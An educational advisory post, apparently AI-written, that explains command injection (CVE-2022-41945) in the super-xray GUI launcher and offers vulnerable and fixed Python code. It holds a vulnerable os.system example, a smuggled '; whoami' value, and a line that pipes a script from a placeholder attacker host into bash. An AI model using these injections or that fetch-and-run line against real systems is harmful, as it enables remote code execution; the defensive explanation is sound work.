Super-xray is a beginner-friendly GUI (graphical user interface) launcher for xray, a powerful open-source vulnerability scanner. While GUIs make security tools easier to use, they can also introduce new risks. One such risk was discovered in super-xray version .1-beta, tracked as CVE-2022-41945. Here’s what went wrong, how the exploit works, and how you can stay safe.
What is CVE-2022-41945?
CVE-2022-41945 is a security vulnerability in super-xray's early GUI (version .1-beta). In this version, when a user inputs a URL to scan for vulnerabilities, the software does not check or clean the URL. Instead, it takes whatever was typed and pastes it straight into a system command, a classic example of command injection. This means an attacker could enter a specially crafted URL that does more than start a scan: it could run any command they wish on the machine where super-xray is running.
Let's see a simplified version of the code that caused the issue:

```python
import os

user_url = input('Enter URL to scan: ')
# Vulnerable: the raw string is pasted into a shell command line, so shell
# metacharacters in the input are interpreted by the shell
os.system(f"xray webscan --url {user_url}")
```
If a user types a safe URL like https://example.com, the scanner works fine.

But if someone enters this malicious input:

```
http://victim.com; whoami
```

here's what super-xray (.1-beta) would really run:

```
xray webscan --url http://victim.com; whoami
```
The semicolon (;) is a command separator in most shells. So, after running the scan against http://victim.com, the computer would execute whoami, showing the current OS username. An attacker could do much more, like reading files, installing malware, or opening backdoors.
A more dangerous input, and the command it turns into:

```
http://legit.com; curl http://evil.com/reverse.sh | bash
```

```
xray webscan --url http://legit.com; curl http://evil.com/reverse.sh | bash
```
Links to Original References
- Official CVE Record (MITRE)
- super-xray GitHub repository
- Vulnerability announcement (in issue tracker)
- xray by Chaitin Tech
How Did They Fix It?
The developers released super-xray .2-beta to address the bug. In the fixed version, user input is sanitized or passed as a safe argument to the scanning tool, rather than being merged directly into a shell command:

Safe Example (Fixed Code)

```python
import subprocess

user_url = input('Enter URL to scan: ')
# Pass the arguments as a list: no shell is involved, so a ';' in the input
# stays part of the URL argument instead of separating commands
subprocess.run(["xray", "webscan", "--url", user_url])
```
Or, even better, validate the URL first so that only well-formed http or https web addresses are accepted at all.
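The following is an added example of what "pass it as an argument and validate it first" looks like when both steps are combined. It is not super-xray's own code; only the `xray webscan --url` invocation comes from the page. The hostname rule, the rejected character set and the helper names (`validate_scan_url`, `build_scan_command`, `argv_roundtrip`) are assumptions made here for illustration. `argv_roundtrip` uses a Python interpreter as a stand-in for xray so the check runs without the scanner installed, and shows that the list form hands the child process the whole string as one argument.

```python
import re
import subprocess
import sys
from urllib.parse import urlsplit

# Characters that mean something to a shell but never belong in a scan target.
# The list form of subprocess already makes them harmless; rejecting them is
# defence in depth (a policy chosen for this example, not super-xray's own).
SHELL_METACHARS = set(';|&`$<>()\'"\\')
ALLOWED_SCHEMES = {"http", "https"}
# One DNS label: letters, digits, hyphens, no leading/trailing hyphen, max 63 chars.
# IPv4 literals pass as digit-only labels; bracketed IPv6 hosts are rejected.
HOST_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{HOST_LABEL}\.)*{HOST_LABEL}$")


def validate_scan_url(url: str) -> str:
    """Return url unchanged if it is a plain http(s) address, else raise ValueError."""
    if not url or url != url.strip():
        raise ValueError("empty URL or surrounding whitespace")
    if any(ch.isspace() for ch in url) or any(ch in SHELL_METACHARS for ch in url):
        raise ValueError("URL contains whitespace or shell metacharacters")
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme must be http or https, got {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials embedded in the URL are not allowed")
    if not parts.hostname or not HOST_RE.match(parts.hostname):
        raise ValueError("missing or malformed hostname")
    try:
        parts.port  # raises ValueError when the port is not a valid integer
    except ValueError:
        raise ValueError("malformed port") from None
    return url


def is_safe_scan_url(url: str) -> bool:
    """Boolean wrapper around validate_scan_url for callers that only need yes/no."""
    try:
        validate_scan_url(url)
        return True
    except ValueError:
        return False


def build_scan_command(url: str, xray_path: str = "xray") -> list[str]:
    """Build the argv list for xray; each element is one argument, never a shell string."""
    return [xray_path, "webscan", "--url", validate_scan_url(url)]


def run_scan(url: str, xray_path: str = "xray") -> int:
    """Launch xray without a shell and return its exit status (needs xray installed)."""
    return subprocess.run(build_scan_command(url, xray_path), check=False).returncode


def argv_roundtrip(value: str) -> str:
    """Show what a child process receives when value is passed as a list element.
    A Python interpreter stands in for xray and echoes back its argv[1]."""
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", value]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    # Constructed sample inputs: the benign URL and the injection string from the page
    for candidate in ("https://example.com", "http://victim.com; whoami"):
        print(f"{candidate!r}: accepted={is_safe_scan_url(candidate)}")
    # Even with no validation at all, the list form keeps the whole string as one
    # argument: the child sees "http://victim.com; whoami" and no whoami runs.
    print("child saw:", argv_roundtrip("http://victim.com; whoami"))
```

The two layers are independent: `build_scan_command` refuses anything that is not a plain web address, and even if validation were removed, `argv_roundtrip` demonstrates that the separator in `http://victim.com; whoami` never reaches a shell, because no shell is started.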
- Upgrade: Always use super-xray .2-beta or later.
- Download from Official Sources: Get releases from https://github.com/4ra1n/super-xray/releases.
- Never Trust User Input: If you write tools or scripts, never put user data directly into shell commands.
- Check for Unknown Activity: If you used the vulnerable version, check your system for suspicious commands or files.
Simple Takeaway
This vulnerability in super-xray .1-beta is a reminder: GUIs are only as safe as the code behind them. Filtering and sanitizing input is critical, especially for security tools. Upgrade your tools, and stay alert for command injection risks.
Upgrade now! Don’t let a simple input field open the door for attackers.
*This post is exclusive and written in simple American language by AI, for educational purposes only. For more details, read the official CVE advisory and the project's GitHub issues.*
Timeline
Published on: 11/21/2022 23:15:00 UTC
Last modified on: 03/01/2023 18:03:00 UTC